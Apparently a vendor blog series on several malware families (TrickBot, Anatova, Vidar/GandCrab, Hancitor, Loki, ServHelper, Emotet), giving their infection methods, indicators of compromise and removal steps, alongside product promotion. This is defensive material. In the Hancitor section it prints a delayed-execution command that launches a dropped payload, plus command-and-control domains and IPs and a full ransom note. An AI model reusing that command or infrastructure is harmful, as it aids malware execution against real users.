TrickBot

TrickBot is once again making itself known during tax season and attempting to steal your hard-earned money. TrickBot was originally discovered in October of 2016 but has since changed and evolved dramatically into one of the most prolific attacks today.

How it works

Just like Emotet, TrickBot primary spreads by specially designed emails or malspam that attempts to trick the user into clicking or downloading the attachment. The current campaign, as of this writing, is TrickBot’s normal tax season attack:  pretending to be the IRS. In the example below, the link will send you a to a domain that looks official but is slightly misspelled.

Once TrickBot is installed on a computer, it sets up a scheduled task to make sure it has a persistent presence on the computer before starting to steal information. In addition, it disables Windows Defender early on so that it won’t be removed. SUPERAntiSpyware is not stopped in this way.

TrickBot does not show any signs of running on a user’s computer and the only “noise” it makes is the network traffic it creates. Recording network traffic is generally only done by businesses, which helps TrickBot evade detection on personal computers.

TrickBot uses a module design, much like Emotet and other bankers.  Not only does this allow TrickBot to quickly change its attack capabilities, but it also makes it harder to detect. These modules often do one thing well rather than trying to do many things. Some are designed to go after hosted ftp servers, cached remote desktop credentials, and bitcoin mining accounts.

The most common module, however, allows TrickBot to redirect the user to fake bank sites that, instead of logging the user in, will steal account credentials. The scammers make this possible by domain squatting, or registering an internet address that is only slightly different than the one you intend to visit. For instance, if you receive an email about your GoDaddy account, you might not notice if a link in that email goes to godabdy.com/payyourbill  (godaddy is misspelled with a b instead of the second d).

This is compounded upon by hiding the URL so only the studious will look for it and by making the site look like you expect through careful recreation by the attackers. Many big companies will attempt to combat this by buying these fake sites and then redirecting them to the appropriate domain, but this is not always easily done.

Who is affected?

TrickBot is aimed more at business than casual users; however, it is still the number-one banker, and anyone who lives inside the USA, Africa, Europe, and Middle East should be wary. (This does not exclude other areas from being hit, just shows that they are not the current target.)

Indicators of Compromise

  1. C:\Documents and Settings\<USER>\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1275210071-920026266-1060284298-1003\8c8436195f6e0875edb85e34665c32ec_fabbc6a1-c573-4ea0-9ca1-50004b35a440
  2. C:\d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90
  3. sha256:  d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90       
  4. sha1: df404c6b1efc2cfbfdd0b7699554989dab03791f       
  5. md5: e580ca34929cf9b62e816adcebe715f2
  6. C:\Users\admin\AppData\Roaming\msscsc\e690ca34929cf9b72e917adcebe816f2.exe
  7. d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90         
  8. http://ip.anysrc.net/plain/clientip           
  9. Scheduled Task that points to a file in AppData such as C:\Users\<User>\AppData\Roaming\

What you can do


If you or someone you know is infected with TrickBot malware, download SUPERAntiSpyware Professional right now and get a 14 day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove TrickBot from any Windows computer. If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

Anatova

Anatova is the nickname given to a new brand of sophisticated ransomware that looks to encrypt your personal or business files and then demands payment to decipher them.

How it works

Anatova is distributed through peer-to-peer (P2P) file sharing networks. It masquerades as genuine software, often using real icons to fool users into believing it is authentic. Once you run the malicious file, it begins to encrypt your personal documents, after which it will demand you send payment to regain access to your files.

This can be extremely hazardous for larger organizations, since Anatova can affect files across local networks. This ransomware is designed to encrypt your files quickly to avoid detection. It fully encrypts files that are less than 1 Megabyte, and encrypts only a single Megabyte of files larger than that. Even though the larger files are not completely encrypted, enough damage has been done that they are, most likely, no longer usable.

Another fascinating thing about Anatova is its resistance to analysis. It encrypts most of its internal strings, cleans its own data out of memory, causes bugs in common analysis programs, and stops execution if it detects that it is in a virtual or test environment.

One of the most dangerous aspects of Anatova is the fact that it is built to be modular. This means that it was designed to have new features added to it at any time. Instead of just encrypting your files, future versions of Anatova could steal your personal info and passwords, add your computer to a malicious botnet, or a multitude of other things.

Who is affected

Due to its current distribution method, most people who do not use peer-to-peer file sharing should be safe from this threat. If you do you happen to use P2P file sharing, we strongly suggest you scan every file you download before opening it, both with SUPERAntiSpyware and VirusTotal.

The majority of Anatova detections have been in the United States, although infections have been seen across Europe as well. This malware checks your system language and refuses to run in several countries such as Iraq, India, and the Commonwealth of Independent States.

Indicators of compromise

Generally one of the biggest indicators of a ransomware attack is the changed extensions on the encrypted files. This ransomware, however, does not alter the file extensions, which makes casual detection of an Anatova infection more difficult.

A better indicator is the ransom note that this malware leaves behind. Anatova will drop a text file into each folder where it has encrypted a file. This text file gives instructions on how to pay the ransom to get your files unlocked:

All your files are crypted. Only us can decrypt your files, you need to pay 10 DASH in the address:

XnzvWQKv22uPDCYcuGebyoaVinekkJicbK

After the payment send us the address used to make the payment to one of these mail addresses:

anatova2@tutanota.com

anatoday@tutanota.com

Later wait for our reply with your decryptor. If you want to send us ONE JPG FILE ONLY max 200kb to decrypt per free before of payment

Don’t try fuck us, in this case you NEVER will recover your files. Nothing personal, only business.

Send this file untouched with your payment or/and free file!

—KEY—

<random key>

—KEY—

What you can do

SUPERAntiSpyware detects many variants of Anatova; however, new versions are being created all the time so make sure to always update to the latest database version. Also, upgrading to Real-Time protection will dramatically increase your level of protection from this threat.

Refraining from using Anatova’s primary infection vector — peer-to-peer file sharing services — should effectively keep your system safe from this infection. As stated before, if you do use P2P file sharing services, you must be extremely careful with what you download. Make sure to scan every file with SUPERAntiSpyware and VirusTotal to ensure it is safe before opening it.

How To Remove Anatova

  1. Using an uninfected system, search the internet for a decryptor for your particular version of Anatova and copy it to a USB drive — I would suggest starting your search with No More Ransom.
  2. Restart the infected computer in Safe Mode with Networking.
  3. Insert the USB drive with the decryptor, copy it to the desktop, then eject and remove the drive.
  4. Run the decryptor.
  5. Assuming the decryptor is successful, update your SUPERAntiSpyware to the latest database version and run a complete scan to remove any traces of Anatova from your system.
  6. If the decryptor does not work, you can take your computer to a data recovery expert.

How To Remove Vidar/GandCrab

Vidar is a relatively new keylogging, data-stealing malware campaign. It is generally distributed through malicious advertisements on less-than-reputable sites such as bit torrent or free video streaming sites. These malvertisements redirect their victims to various exploit kits such as Fallout and GrandSoft, which in turn will infect your machine with various malevolent payloads such as Vidar.

How it works

Vidar is sold or rented as a service to the blackhats. For the low price of $700 they are able to utilize Vidar’s distribution system to spread their own malware. They can even customize it to steal a variety of your sensitive data such as browser history, website logins, credit card numbers, and cryptocurrency wallets.

One of the more common payloads is the ransomware called GandCrab. Ransomware is exactly what it sounds like – it encrypts your files and demands payment in order to decrypt them. SUPERAntiSpyware detects many variants of the GandCrab ransomware. Our researchers are hard at work daily to detect more variants and help combat this threat.

Unfortunately once your system becomes infected with ransomware like GandCrab, there are few options for you. You can either pay the ransom and hope they unlock your files, or you may get lucky and find that a decryptor has been created. Currently there are decryptors for some versions of GandCrab (V1, V4, and V5). It is worth noting that these decryptors, while definitely helpful, do not always work perfectly for all encrypted files. The final option is less appealing – wipe your system and reinstall Windows. The upside is that you should be able to use your computer again without paying. The downside is that you will have lost all your documents.

Our suggestion to protect yourself from ransomware is relatively simple: Back up your files. Being able to restore your important documents from a cloud or local backup is the best way to thwart a ransomware attack. Keeping your system up to date with software patches is also something we recommend to help protect yourself.

Who is affected

Due to the way it is distributed, Vidar does not target individuals or businesses directly. It relies on people clicking on their malicious advertisements. In general, you should avoid clicking ads online, no matter how enticing. Something interesting about GandCrab is that it has been known to check if you have a Russian keyboard layout, and if so it terminates its execution immediately.

Indicators of compromise

Vidar itself is very stealthy, doing its data thievery quickly and silently in the background. It’s very likely that you won’t even know that Vidar has hit you until it drops its payload. Vidar drops some text files onto your system into ProgramData\(random string)\ and ProgramData\(random string)\files\. These files contain passwords and other information that Vidar has stolen. There may also be a zipped file containing copies of these text files.

The most common malware delivered by Vidar has been GandCrab ransomware. Within a minute or so, GandCrab will change your Windows background to something similar to this:

There will be an HTML or text file called (random)-DECRYPT dropped into every folder where files have been encrypted by GandCrab, containing instructions on how to pay the ransom to get your documents back. You will also notice that the encrypted files will have their extension changed to something random instead of the correct extension:

Here is a list of file types that may be targeted for encryption by GandCrab:

.sql, .mp4, .7z, .rar, .m4a, .wma, .avi, .wmv, .csv, .d3dbsp, .zip, .sie, .sum, .ibank, .t13, .t12, .qdf, .gdb, .tax, .pkpass, .bc6, .bc7, .bkp, .qic, .bkf, .sidn, .sidd, .mddata, .itl, .itdb, .icxs, .hvpl, .hplg, .hkdb, .mdbackup, .syncdb, .gho, .cas, .svg, .map, .wmo, .itm, .sb, .fos, .mov, .vdf, .ztmp, .sis, .sid, .ncf, .menu, .layout, .dmp, .blob, .esm, .vcf, .vtf, .dazip, .fpk, .mlx, .kf, .iwd, .vpk, .tor, .psk, .rim, .w3x, .fsh, .ntl, .arch00, .lvl, .snx, .cfr, .ff, .vpp_pc, .lrf, .m2, .mcmeta, .vfs0, .mpqge, .kdb, .db0, .dba, .rofl, .hkx, .bar, .upk, .das, .iwi, .litemod, .asset, .forge, .ltx, .bsa, .apk, .re4, .sav, .lbf, .slm, .bik, .epk, .rgss3a, .pak, .big, wallet, .wotreplay, .xxx, .desc, .py, .m3u, .flv, .js, .css, .rb, .png, .jpeg, .txt, .p7c, .p7b, .p12, .pfx, .pem, .crt, .cer, .der, .x3f, .srw, .pef, .ptx, .r3d, .rw2, .rwl, .raw, .raf, .orf, .nrw, .mrwref, .mef, .erf, .kdc, .dcr, .cr2, .crw, .bay, .sr2, .srf, .arw, .3fr, .dng, .jpe, .jpg, .cdr, .indd, .ai, .eps, .pdf, .pdd, .psd, .dbf, .mdf, .wb2, .rtf, .wpd, .dxg, .xf, .dwg, .pst, .accdb, .mdb, .pptm, .pptx, .ppt, .xlk, .xlsb, .xlsm, .xlsx, .xls, .wps, .docm, .docx, .doc, .odb, .odc, .odm, .odp, .ods, .odt

What you can do

SUPERAntiSpyware detects many variants of Vidar, however new versions are being created all the time so make sure to always update to the latest database version. Also, upgrading to Real-Time protection will dramatically increase your level of protection from this threat.

Installing an Ad Blocker on your computer can help stop Vidar at its source, however one of the best practices is to refrain from clicking on any advertisements online.

If your files have been encrypted by GandCrab, you may still be able to decrypt them. Various companies and individuals create ransomware decryptors and release them on the internet. These decryptors are specifically designed to unlock files that were encrypted with a particular version of ransomware, so make sure to note the version of GandCrab when looking for a decryptor – the version we were infected with was 5.0.4. No More Ransom is a repository of most of the decryptors available and is always being updated.

If you are not able to find a decryptor that works, SUPERAntiSpyware suggests that you do not pay the ransom. There is no guarantee that the blackhats will unlock your files once they receive your payment. In 2018 it was reported that paying the ransom actually gets your files decrypted less than 50% of the time. If your data is extremely crucial, we suggest you contact a company who specializes in data recovery services.

HOW TO REMOVE Vidar/GandCrab

  1. Using an uninfected system, search the internet for a decryptor for your particular version of GandCrab and copy it to a USB drive – I would suggest starting with No More Ransom
  2. Restart the infected computer in Safe Mode with Networking
  3. Insert the USB drive with the decryptor, copy it to the desktop, then eject and remove the drive
  4. Run the decryptor
  5. Assuming the decryptor is successful, update your SUPERAntiSpyware to the latest database version and run a complete scan to remove any traces of Vidar from your system
  6. If the decryptor does not work, you can take your computer to a data recovery expert

How to remove Hancitor

Hancitor, also known as Chanitor, is known for dropping its payloads rather than downloading them post-infection, as well as for a unique phishing approach to trick users into downloading and activating Microsoft Word documents with malicious macros.

How it works

Hancitor uses a new template that attempts to fool the user into believing that it is a FedEx tracking number. There is no attachment, however; instead, the tracking number link directs the user to the sjkfishfinders[.]com domain and then downloads the Word document. Once downloaded, the Word file attempts to trick the user into allowing macros, which would trigger code residing inside the file. An example can be seen below:

The lack of an attachment, often seen as a red flag by many users, may lure the user into a false sense of security. It is important to be careful about which links you click: on most modern web browsers, hovering your mouse pointer over the link will tell you where the link will lead to. If you do not know the address, then it is safer to avoid following the link.

When a user enables the macro, rather than download the application from the internet, the application it is instead extracted from inside the document and dropped in the hidden folder \AppData\Local. Before finishing, the script launches the command cmd.exe /c ping localhost -n 100 && C:\Users\admin\AppData\Local\Temp\6.pif. Ping is used to delay the attack to avoid automatic detection by waiting for approximately 100 seconds before running the dropped application 6.pif. 6.pif then reaches out to a C&C server before downloading new malware or running commands.

In addition to 6.pif, another file is dropped at C:\Users\admin\AppData\Local\Temp\6fsdFfa.com. This executable is a banker. Immediately after being run, it reaches out to api.ipify.org, which returns the victim’s public IP address. It then attempts to submit several unique values and the IP address in plain text to a list of infected servers. If the infected servers reply back indicating that they are available to receive the data, the program will  begin compiling all the usernames and passwords it can obtain and submit them to the server.

Other templates have been used by Hancitor in the past, including but not limited to: divorce papers, parking tickets, and FTC claims. As always, its important to have Microsoft Office macros disabled unless required by your job.

Who is affected?

Anyone with an email address can become a target of this mal-spam campaign. While it does not use victims’ email addresses like Emotet does, Hancitor’s unique templates are meant to catch even savvy users off guard, regardless of whether the email is used for work or is a personal email.

Indicators of Compromise

  1. cmd.exe /c ping localhost -n 100 && C:\Users\admin\AppData\Local\Temp\6.pif
  2. sha256: 76b96c8d796cfcebff34d42e65e5a4ab2770fda42ea3c259097ee068660dfcc2                        
  3. md5: 4d4e366b0813148f12fa1a2638c43f72         
  4. C:\Users\admin\AppData\Local\Temp\6fsdFfa.com        
  5. Felighevengna[.]com    
  6. api.ipify.org       
  7. verrestofred[.]ru             
  8. 81.171.7.39        
  9. 54.204.36.156    
  10. 95.169.184.23                    
  11. felighevengna.com/4/forum[.]php          
  12. verrestofred.ru/4/forum[.]php 

What you can do


If you or someone you know is infected with Hancitor malware download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove Hancitor from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

How To Remove Hancitor

  1. Restart the infected computer in safe mode without networking.
  2. Search through the items in the Indicators of infection section above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

Definitions

Attack Vector: Is the way the attacker gains access to a target. The most common of these are malicious emails but many more exist and are discovered all the time.

BackDoor: Is a bypass allowing a Malicious user to connect to the target machine without permission from the target. These can be in the form of default username and passwords baked into the machine or a malicious download that opened a connection for the malicious user.

BlackHat: Is a term referring to a hacker who hacks for personal gain. The term refers to the old western movies where the good guy would wear a white hat and the bad guys would wear a Blackhat.

Banker: Refers to a malicious file that attempts to steal bank information from the user.

Domain squatting/cybersquatting: refers to holding or squatting on a misspelled or visually similar web address to trick victims into visiting and trusting the site.

Downloader: Refers to a software that Maliciously downloads another file from the internet and then executes it.

Dropper: Refers to a software that has a malicious file residing inside of it which is extracted and then ran.

Keylogger: A piece of software designed to record every key pressed on your keyboard, mostly used to steal your usernames and passwords.

Mal-Spam: (malicious-Spam) is a technique used by attackers where they send out emails pretending to be something you would expect to receive. This is a very common attack.

Ransomware: A type of malware which encrypts your files, effectively holding your documents hostage until you pay to get them unlocked.

Supply Chain Attack: A attack Vector involving malicious attackers gaining access to trusted software and injecting there own code inside of it. Allowing them to bypass many security checks.

How to remove Loki

Delivered through malicious spam campaigns, Loki focuses on stealing credentials off the victim computer and runs a keylogger. Loki also communicates back to a Command and Control server (C&C) to report what it finds and to receive commands if needed.

How it works

Loki, named after the creator’s username Lokistov, is delivered to users through a variety of channels, but the most common is malicious emails that can come in a variety of types. The most common strategy is the familiar “invoice” style email that attempts to get the potential victim to open the attachment. Once opened, the “invoice” will try to run embedded macros or get the user to follow a link to a downloader. One example of such a “invoice” can be found below.

Invoice enable content picture

If the potential victim were to click “Enable Content,” Loki would be installed and start gathering data. This is a common attack vector[  and was used by, albeit in a more complex way, Emotet.

This is not the only way Loki can be delivered, however, as it can be purchased by a malicious user,  Loki will be delivered in the most cost effective way.

Loki focuses primarily on credential-stealing and boasts an impressive 80 programs it has the ability to steal from. The most notable being all major browsers, including:

  • Google Chrome
  • Mozilla Firefox
  • Microsoft Edge
  • Microsoft Internet Explorer
  • Opera Software’s Opera browser

In addition to this already worrying list, Loki is able to go after many alternative versions of these browsers such as:

  • 8pecxstudio’s variant of Firefox, Cyberfox
  • Google’s open-source browser Chromium
  • Independently developed Firefox fork, WaterFox
  • Nichrome

In addition to browsers, Loki can go after FTP clients, Microsoft Outlook, and independently developed SuperPuTTY. This list will likely be expanded in future campaigns to include more commonly used programs if vulnerabilities are found.

After connecting and confirming the presence of its C&C server, Loki launches a keylogger in a separate thread. This keylogger records every button press of the keyboard during its operation and can be used to reveal other passwords and usernames that may not have been stored in a program it can access. This is then bundled with any other data it retrieved.

Once the data is gathered, it is compressed and sent to the C&C server hosted by the malicious actor. These normally are shut down quickly after a new campaign has been identified but can remain active for days or weeks at a time giving them plenty of time to store the gathered data somewhere else and sell it.

Who is affected?

Loki can be bought in the dark web for fairly cheap. Last know price at the time of this writing was $70. The consequence of this is that Loki can be used to target anyone. The benefit of the availability is it makes it much easier for Anti-Malware companies to stop it.

Indicators of Compromise

  1. C:\Users\admin\AppData\Local\Temp\saver.scr
  2. a.doko.moe
  3. MD5: 500F84B83BE685009C136A67690CA0C3

What you can do


If you or someone you know is infected with the Loki malware download SUPERAntiSpyware Professional right now and get a 14 day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove Loki from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech03 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

How To Remove Loki

  1. Restart the infected computer in safe mode without networking.
  2. Search through the items in the Indicators of Infection section above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

How to remove ServHelper

ServHelper is a new backdoor with a downloader variant, which first appeared in November of 2018. Named by the Threat actor “Ta505,” ServHelper spreads through email campaigns using a quantity-over-quality approach that has proven to work, albeit less effectively than the Emotet strategies discussed here. ServHelper seems to be largely targeted toward businesses but could change to focus on individual’s in future campaigns.

How does ServHelper works

ServHelper is downloaded through Microsoft Word documents with macros. The documents often pretend to be invoices, though they may take other forms such as, but not limited to: greeting cards, complaints, or details from your bank. These documents attempt to convince the victim to enable macros in them by saying that the content cannot be viewed until macros are enabled. If the victim clicks the Enable Content button, the infected document runs code that downloads ServHelper to the computer. You can learn more about how to protect yourself here. An example is shown below:

 Infected enable Content doc

Another method employed by ServHelper is to distribute PDF files that claim you must follow the link provided to update your PDF viewer. These links instead reach out to a download server that infects anyone who visits. The end result is the same regardless of whether the victim gets the infection from a Word document or a PDF.

Once installed, ServHelper does one of two things.

  1. Establishes a remote-control session that allows the malicious actor to control the infected computer from anywhere. To accomplish this, the malware talks to a Command and Control server (C&C) where it takes it commands from. Some of the notable commands include: the ability to kill itself and remove traces of itself from the computer, the ability to copy user’s browser profiles, and the ability to execute a command shell. This allows the attackers to gain access to your PII as well as any passwords, usernames, bank account information, and more.
  2. Drops another piece of malware known as FlawedGrace. ServHelper recently removed some of its capabilities (in this version only) to instead focusing on dropping this malware. FlawedGrace acts as a remote-access Trojan providing similar functions to ServHelper.

Who is affected?

ServHelper largely targets businesses, so most of the emails are designed to look like emails you would see in your day-to-day business, such as invoices. Despite this active focus, it’s entirely possible for computers outside of a business to be infected and extorted, so protection is paramount.

Indicators of Compromise

ServHelper makes several changes that indicate whether a computer has been infected.

  1. The most noticeable one is the C:\Windows\ServHelper.dll that is dropped in the windows folder.
  2. Unusual scheduled startup tasks are always noteworthy and ServHelper uses them to start itself every time a victim’s computer is ran.
  3. C:\PROGRAM FILES\COMMON FILES\SYSTEM\WINRESET.EXE
  4. crl.verisign[.]com/pca3[.]crl
  5. hxxp://ocsp.verisign[.]com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D
  6. hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl[.]cab
  7. IP: 104.81.60.211
  8. IP: 104.81.60.51
  9. IP: 2.17.157.9

What you can do

If you or someone you know is infected with the ServHelper malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove ServHelper from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech02 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

How to Remove ServHelper

  1. Restart the infected computer in safe mode without networking.
  2. Search through the Indicators of infection listed above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

How to remove Emotet

You may have heard of the Trojan Emotet before. Since first appearing back in 2014 stealing banking information, it has evolved into a multi-faceted threat that targets everyone. It uses social engineering through emails to attempt to convince the user to open a Microsoft Word document and run its malicious macros. Even more worrisome is that once Emotet has infected a target, it attempts to take over the victim’s Microsoft Outlook desktop application. If successful, Emotet goes through all sent emails and contacts and send out a new wave of spam emails. Only this time, the potential victims are receiving the message from a trusted email.

A campaign from Emotet over the Christmas season read like a friend sending a friendly season greeting.

Dear <name>,

You make the stars shine brighter and the winter days warmer just by being in my life. Merry Christmas to my favorite person in the world.

Merry Christmas and a wonderful New Year!

Greeting Card is attached

A lovely thing about Christmas is that it’s compulsory, like a thunderstorm, and we all go through it together. Garrison Keillor

While not limited to invoices or Christmas cards, these emails attempt to get the user to click the download link and then to open the document. In the email mentioned above the target may be fooled into thinking that the attached greeting card is legitimate.  The document actually contains a malicious macro, an embedded script. While macros were initially designed to help automate keystrokes and mouse movements, they were quickly abused by nefarious virus creators. The infection cannot run on its own as Microsoft has automatically disabled macros more than a decade ago to help stop these malicious scripts. Instead, Emotet uses a few techniques to get the user to re-enable macros. Examples can be seen below.



The picture urges the user to click the Enable Content button, implying that they cannot view the Word document until they do so. You may have already noticed that the bar itself says that macros have been disabled, and the Enable Content button will, in fact, allow them. The moment that Enable Content button is clicked, the macros will start, and in seconds you will be infected. Even worse, in most cases you will have no indication from this point forward that anything is wrong. In one test case we briefly had a command window appear:



This window lasted less than two seconds before disappearing. This attack vector is not unique to Emotet though. In fact, it has been used by a number of ransomware attacks in the past. If you ever see a document you didn’t expect to receive, you should always be extremely cautious with it and you should never enable macros without a very good reason.

How it works

Emotet is an evolving malware that has been known to primarily spread itself through email spam campaigns.  Emotet itself does not attempt to do much harm; instead, it opens the door for other malware who pay the doorman on the way in. It achieves this by using what is known as a Command and Control server (C&C): Emotet requests instructions from its C&C server, which  issues a new command. This command could be anything from “grab this malware sample and run it” to “tell me what passwords are stored in the user’s browser.” Emotet can receive updates and new capabilities in this way as well, showing that if Emotet has infected your computer or network, it should be removed as quickly as possible.

Emotet doesn’t stop at the first computer infected though. Once it’s on a network, it will attempt to get to all computers it’s connected to through a brute-force attack. Unless strong passwords are enforced on machines and all known vulnerabilities are patched, a single installation of Emotet can cause every computer in the network to become infected. Emotet is often updated with new exploits as they are found, meaning that while it may not be successful at first, it will keep trying until it finds something that does work.

Code

We won’t go into too much depth on the actual code itself, but a brief step-by-step walkthrough can be useful to get a better understanding on how this malware works.

1. In the Word document there is a VBA script that is obfuscated so that you cannot read it at a glance. All this code does is launch a command shell, which then launches PowerShell, a more powerful version of the Windows command shell.

2. Using PowerShell, the script attempts to download the core Emotet payload from a large variety of distribution websites.

3. The randomly named payload will then reach out to the main server and request a command. The command will change based on the campaign that is running —it could go grab new malware or it could attempt to use your own email address as a way to spread itself.

Who is affected

Many people assume that they will not be targets of malware campaigns. Emotet, though, targets everyone equally: it has the simple goal of getting on every machine it can and then getting paid to let other, more targeted malware come in behind it. If your email address has ever been sold, disclosed in a breach, or was on a friend’s email list when they got infected, then it’s possible you will receive a malicious email from them.

Indicators of infection

The main location for the executable is in C:\Users\<name>\AppData\Local\ and then whatever new name Emotet decides to use. One we have seen often is archivessymbol, but this will change. If you see something in this folder you don’t know about, it’s important to run a scan.

Versions of Emotet can also drop files onto your computer in C:\Users\Public or C:\Users\<username>:

These files generally have 5-6 randomly generated numbers in the file name, followed by .exe. These are not actually executable files, but HTML documents that are used to generate revenue for the Blackhat’s by simulating clicks on web advertisements.

What you can do


If you or someone you know is infected with the Emotet malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove Emotet from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech01 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

Emotet has also been known to exploit a vulnerability in Windows called EternalBlue. Microsoft has issued a patch for this, and applying this patch can help protect you from Emotet as well as other malware who utilize this exploit.

HOW TO REMOVE EMOTET

  1. Restart the infected computer in safe mode without networking
  2. Search through the Indicators of infection and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

It is time to leave Windows XP and Windows Vista behind

Frequently we here at SUPERAntiSpyware HQ still encounter users who use Windows XP and Windows Vista and we have one thing to say, its time to move on. Yes it may have served you well and change is hard but it is for the better. Windows XP extended support ended on April 8, 2014 and Windows Vista extended support ended on April 11, 2017. These operating systems are now declared end of life and unsupported by Microsoft and no longer receive regular updates.

As Microsoft has stated on their website: leave windows xp

 “An unsupported version of Windows will no longer receive software updates from Windows Update. These updates include security updates that can help protect your PC from harmful viruses, spyware, and other malicious software which can steal your personal information. Windows Update also installs the latest software updates to improve the reliability of Windows—such as new drivers for your hardware.”

On top of Microsoft no longer supporting Windows Vista and XP, many software vendors no longer support these operating system either. The current versions of the popular web browsers Google Chrome and Mozilla Firefox no longer support these operating systems forcing many users to use outdated versions or extremely old versions of Internet Explorer which is rife with security flaws. Not good!

We recommend all users of these unsupported operating systems update to at least Windows 7, if not 8.1 and 10. This will ensure your data is more secure and less likely to be stolen or destroyed by hackers or malware infections.

Layerin’ Ain’t Just for Winter! Bolster Your Security With Layers of Protection

Virus infection

I thought Spyware and Viruses are the same thing?

A virus is malicious code that copies itself over and over in order to do damage to your computers data while Spyware is an umbrella term used to describe a variety of threats such as Trojans, Ransomware, Keyloggers, Cookies, Worms, etc that may do damage to your PC and/or privacy but do not have the intention of totally destroying your computers data and system unlike a virus.

So your telling me I need an Anti-Virus AND an Anti-Spyware?

Strictly speaking, SUPERAntiSpyware© is not designed to be Anti-Virus software. We target Spyware, a focus that allows us to respond quickly to the ever-growing groups of hostile software we address, with new definitions released multiple times a day, and concentrate on the technology that targets the most common threats in the wild. There are a lot of things that are often called viruses (many trojans, worms, and so on) that SUPERAntiSpyware© will remove, but it won’t remove true viruses such as boot-sector viruses.

Security With Layers of Protection

No one security tool can catch everything out there and protect you, which is why we recommend a layered approach. We recommend if you use an Anti-Virus, you supplement it with SUPERAntiSpyware© and if you only use SUPERAntiSpyware© alone, consider getting an Anti-Virus. SUPERAntiSpyware© has been designed to be compatible with popular Anti-Virus applications such as McAfee, Symantec(Norton), Kaspersky, Bitdefender, ESET NOD32, AVG, Avast, Panda, Avira, and so on.